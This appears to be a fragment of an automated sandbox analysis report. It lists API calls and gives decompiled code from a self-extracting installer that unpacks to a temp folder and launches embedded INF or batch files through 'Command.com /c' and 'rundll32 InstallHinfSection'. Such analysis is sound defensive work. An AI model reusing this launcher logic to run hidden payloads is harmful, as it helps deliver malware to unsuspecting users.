                                                                                                                                                                                                        0x000c3ced
                                                                                                                                                                                                        0x000c3ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3ce8
                                                                                                                                                                                                        0x000c3c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3c9e
                                                                                                                                                                                                        0x000c3c56
                                                                                                                                                                                                        0x000c3d35
                                                                                                                                                                                                        0x000c3d35
                                                                                                                                                                                                        0x000c3d3c
                                                                                                                                                                                                        0x000c3d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3d48
                                                                                                                                                                                                        0x000c3c03
                                                                                                                                                                                                        0x000c3be2
                                                                                                                                                                                                        0x000c3be7
                                                                                                                                                                                                        0x000c3bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 000C3CDC
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,000C8C42), ref: 000C3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 000C3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,000C8C42), ref: 000C3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,000C8C42), ref: 000C3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,000C8C42), ref: 000C3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,000C8C42), ref: 000C3F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,000C8C42), ref: 000C3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,000C8C42), ref: 000C3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,000C8C42), ref: 000C3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-1838232924
                                                                                                                                                                                                        • Opcode ID: 8d6d557d4820e3f199e7351f82620f7ca880eb4c9c5cc503f5d878c1ed510d27
                                                                                                                                                                                                        • Instruction ID: a8c9ee3c02ac60a82eccd86520650c6b9718852fac2e87b75d2efcd454600a20
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6d557d4820e3f199e7351f82620f7ca880eb4c9c5cc503f5d878c1ed510d27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4B100706283019BE360DF24D849FAF76E4EB85740F10892DFA86D61E1DB78CA01CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 141 c1ae8-c1b2c call c1680 144 c1b2e-c1b39 141->144 145 c1b3b-c1b40 141->145 146 c1b46-c1b61 call c1a84 144->146 145->146 149 c1b9f-c1bc2 call c1781 call c658a 146->149 150 c1b63-c1b65 146->150 159 c1bc7-c1bd3 call c66c8 149->159 152 c1b68-c1b6d 150->152 152->152 154 c1b6f-c1b74 152->154 154->149 155 c1b76-c1b7b 154->155 157 c1b7d-c1b81 155->157 158 c1b83-c1b86 155->158 157->158 160 c1b8c-c1b9d call c1680 157->160 158->149 161 c1b88-c1b8a 158->161 166 c1bd9-c1bf1 CompareStringA 159->166 167 c1d73-c1d7f call c66c8 159->167 160->159 161->149 161->160 166->167 169 c1bf7-c1c07 GetFileAttributesA 166->169 174 c1df8-c1e09 LocalAlloc 167->174 175 c1d81-c1d99 CompareStringA 167->175 170 c1c0d-c1c15 169->170 171 c1d53-c1d5e 169->171 170->171 173 c1c1b-c1c33 call c1a84 170->173 176 c1d64-c1d6e call c44b9 171->176 187 c1c35-c1c38 173->187 188 c1c50-c1c61 LocalAlloc 173->188 179 c1e0b-c1e1b GetFileAttributesA 174->179 180 c1dd4-c1ddf 174->180 175->174 178 c1d9b-c1da2 175->178 192 c1e94-c1ea4 call c6ce0 176->192 183 c1da5-c1daa 178->183 184 c1e1d-c1e1f 179->184 185 c1e67-c1e73 call c1680 179->185 180->176 183->183 189 c1dac-c1db4 183->189 184->185 191 c1e21-c1e3e call c1781 184->191 198 c1e78-c1e84 call c2aac 185->198 194 c1c3a 187->194 195 c1c40-c1c4b call c1a84 187->195 188->180 197 c1c67-c1c72 188->197 196 c1db7-c1dbc 189->196 191->198 207 c1e40-c1e43 191->207 194->195 195->188 196->196 202 c1dbe-c1dd2 LocalAlloc 196->202 203 c1c79-c1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->203 204 c1c74 197->204 211 c1e89-c1e92 198->211 202->180 208 c1de1-c1df3 call c171e 202->208 209 c1cf8-c1d07 203->209 210 c1cc2-c1ccc 203->210 204->203 207->198 212 c1e45-c1e65 call c16b3 * 2 207->212 208->211 213 c1d09-c1d21 GetShortPathNameA 209->213 214 c1d23 209->214 216 c1cce 210->216 217 c1cd3-c1cf3 call c1680 * 2 210->217 211->192 212->198 219 c1d28-c1d2b 213->219 214->219 216->217 217->211 224 c1d2d 219->224 225 c1d32-c1d4e call c171e 219->225 224->225 225->211
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E000C1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E000C1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E000C1A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E000C1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        					E000C658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E000C1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E000C66C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E000C66C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E000C1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E000C1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E000C16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E000C16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E000C2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E000C171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t140 = 0x525;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t60 =  &_v268;
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t140 = "[";
                                                                                                                                                                                                        								_v1556 = _t151;
                                                                                                                                                                                                        								_t90 = E000C1A84( &_v1556, "[");
                                                                                                                                                                                                        								if(_t90 != 0) {
                                                                                                                                                                                                        									if( *_t90 != 0) {
                                                                                                                                                                                                        										_v1556 = _t90;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "]";
                                                                                                                                                                                                        									E000C1A84( &_v1556, "]");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E000C44B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0xc9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xc1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0xc9a34 =  *0xc9a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0xc9a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E000C171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0xc9a34 =  *0xc9a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E000C1680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E000C1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E000C6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x000c1af3
                                                                                                                                                                                                        0x000c1afa
                                                                                                                                                                                                        0x000c1b07
                                                                                                                                                                                                        0x000c1b09
                                                                                                                                                                                                        0x000c1b1a
                                                                                                                                                                                                        0x000c1b20
                                                                                                                                                                                                        0x000c1b2c
                                                                                                                                                                                                        0x000c1b3b
                                                                                                                                                                                                        0x000c1b40
                                                                                                                                                                                                        0x000c1b2e
                                                                                                                                                                                                        0x000c1b2e
                                                                                                                                                                                                        0x000c1b33
                                                                                                                                                                                                        0x000c1b33
                                                                                                                                                                                                        0x000c1b46
                                                                                                                                                                                                        0x000c1b4c
                                                                                                                                                                                                        0x000c1b52
                                                                                                                                                                                                        0x000c1b57
                                                                                                                                                                                                        0x000c1b5d
                                                                                                                                                                                                        0x000c1b61
                                                                                                                                                                                                        0x000c1b9f
                                                                                                                                                                                                        0x000c1b9f
                                                                                                                                                                                                        0x000c1bb1
                                                                                                                                                                                                        0x000c1bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1b63
                                                                                                                                                                                                        0x000c1b63
                                                                                                                                                                                                        0x000c1b65
                                                                                                                                                                                                        0x000c1b68
                                                                                                                                                                                                        0x000c1b68
                                                                                                                                                                                                        0x000c1b6a
                                                                                                                                                                                                        0x000c1b6b
                                                                                                                                                                                                        0x000c1b6f
                                                                                                                                                                                                        0x000c1b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1b76
                                                                                                                                                                                                        0x000c1b7b
                                                                                                                                                                                                        0x000c1b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1b8c
                                                                                                                                                                                                        0x000c1b8c
                                                                                                                                                                                                        0x000c1b98
                                                                                                                                                                                                        0x000c1bc7
                                                                                                                                                                                                        0x000c1bc9
                                                                                                                                                                                                        0x000c1bcc
                                                                                                                                                                                                        0x000c1bd3
                                                                                                                                                                                                        0x000c1d75
                                                                                                                                                                                                        0x000c1d76
                                                                                                                                                                                                        0x000c1d78
                                                                                                                                                                                                        0x000c1d7f
                                                                                                                                                                                                        0x000c1e05
                                                                                                                                                                                                        0x000c1e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1e12
                                                                                                                                                                                                        0x000c1e1b
                                                                                                                                                                                                        0x000c1e73
                                                                                                                                                                                                        0x000c1e21
                                                                                                                                                                                                        0x000c1e21
                                                                                                                                                                                                        0x000c1e28
                                                                                                                                                                                                        0x000c1e37
                                                                                                                                                                                                        0x000c1e3e
                                                                                                                                                                                                        0x000c1e52
                                                                                                                                                                                                        0x000c1e60
                                                                                                                                                                                                        0x000c1e60
                                                                                                                                                                                                        0x000c1e3e
                                                                                                                                                                                                        0x000c1e79
                                                                                                                                                                                                        0x000c1e7b
                                                                                                                                                                                                        0x000c1e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1d9b
                                                                                                                                                                                                        0x000c1d9b
                                                                                                                                                                                                        0x000c1da0
                                                                                                                                                                                                        0x000c1da2
                                                                                                                                                                                                        0x000c1da5
                                                                                                                                                                                                        0x000c1da5
                                                                                                                                                                                                        0x000c1da7
                                                                                                                                                                                                        0x000c1da8
                                                                                                                                                                                                        0x000c1dac
                                                                                                                                                                                                        0x000c1dae
                                                                                                                                                                                                        0x000c1db4
                                                                                                                                                                                                        0x000c1db7
                                                                                                                                                                                                        0x000c1db7
                                                                                                                                                                                                        0x000c1db9
                                                                                                                                                                                                        0x000c1dba
                                                                                                                                                                                                        0x000c1dbe
                                                                                                                                                                                                        0x000c1dc3
                                                                                                                                                                                                        0x000c1dce
                                                                                                                                                                                                        0x000c1dd2
                                                                                                                                                                                                        0x000c1deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1dd2
                                                                                                                                                                                                        0x000c1bf7
                                                                                                                                                                                                        0x000c1bfe
                                                                                                                                                                                                        0x000c1c07
                                                                                                                                                                                                        0x000c1d55
                                                                                                                                                                                                        0x000c1d5a
                                                                                                                                                                                                        0x000c1d5b
                                                                                                                                                                                                        0x000c1d5d
                                                                                                                                                                                                        0x000c1d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1c1b
                                                                                                                                                                                                        0x000c1c1b
                                                                                                                                                                                                        0x000c1c20
                                                                                                                                                                                                        0x000c1c2c
                                                                                                                                                                                                        0x000c1c33
                                                                                                                                                                                                        0x000c1c38
                                                                                                                                                                                                        0x000c1c3a
                                                                                                                                                                                                        0x000c1c3a
                                                                                                                                                                                                        0x000c1c40
                                                                                                                                                                                                        0x000c1c4b
                                                                                                                                                                                                        0x000c1c4b
                                                                                                                                                                                                        0x000c1c5d
                                                                                                                                                                                                        0x000c1c61
                                                                                                                                                                                                        0x000c1dd4
                                                                                                                                                                                                        0x000c1dd4
                                                                                                                                                                                                        0x000c1dd6
                                                                                                                                                                                                        0x000c1ddb
                                                                                                                                                                                                        0x000c1ddc
                                                                                                                                                                                                        0x000c1dde
                                                                                                                                                                                                        0x000c1d64
                                                                                                                                                                                                        0x000c1d64
                                                                                                                                                                                                        0x000c1d67
                                                                                                                                                                                                        0x000c1d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1c67
                                                                                                                                                                                                        0x000c1c67
                                                                                                                                                                                                        0x000c1c6d
                                                                                                                                                                                                        0x000c1c72
                                                                                                                                                                                                        0x000c1c74
                                                                                                                                                                                                        0x000c1c74
                                                                                                                                                                                                        0x000c1c8e
                                                                                                                                                                                                        0x000c1c99
                                                                                                                                                                                                        0x000c1cc0
                                                                                                                                                                                                        0x000c1cf8
                                                                                                                                                                                                        0x000c1d07
                                                                                                                                                                                                        0x000c1d23
                                                                                                                                                                                                        0x000c1d09
                                                                                                                                                                                                        0x000c1d14
                                                                                                                                                                                                        0x000c1d1b
                                                                                                                                                                                                        0x000c1d1b
                                                                                                                                                                                                        0x000c1d2b
                                                                                                                                                                                                        0x000c1d2d
                                                                                                                                                                                                        0x000c1d2d
                                                                                                                                                                                                        0x000c1d38
                                                                                                                                                                                                        0x000c1d39
                                                                                                                                                                                                        0x000c1d46
                                                                                                                                                                                                        0x000c1cc2
                                                                                                                                                                                                        0x000c1cc2
                                                                                                                                                                                                        0x000c1ccc
                                                                                                                                                                                                        0x000c1cce
                                                                                                                                                                                                        0x000c1cce
                                                                                                                                                                                                        0x000c1cdb
                                                                                                                                                                                                        0x000c1ce6
                                                                                                                                                                                                        0x000c1cee
                                                                                                                                                                                                        0x000c1cee
                                                                                                                                                                                                        0x000c1e89
                                                                                                                                                                                                        0x000c1e91
                                                                                                                                                                                                        0x000c1e92
                                                                                                                                                                                                        0x000c1e94
                                                                                                                                                                                                        0x000c1e97
                                                                                                                                                                                                        0x000c1ea4
                                                                                                                                                                                                        0x000c1ea4
                                                                                                                                                                                                        0x000c1c61
                                                                                                                                                                                                        0x000c1c07
                                                                                                                                                                                                        0x000c1bd3
                                                                                                                                                                                                        0x000c1b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 000C1BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 000C1BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 000C1C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 000C1C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,000C1140,00000000,00000008,?), ref: 000C1CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 000C1D1B
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-819679500
                                                                                                                                                                                                        • Opcode ID: 5a0416bbdb17e004765cd4dee860804b1191cfefc1abc3888ed6d114ba11e18f
                                                                                                                                                                                                        • Instruction ID: 32e5294360a020c59515059ee73201d075107f455b5dd55a8288ba26d4251616
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a0416bbdb17e004765cd4dee860804b1191cfefc1abc3888ed6d114ba11e18f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CA13870A002186FEB609B24CC45FEE77A9AB53310F14429CF996E72D3DBB49E85CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
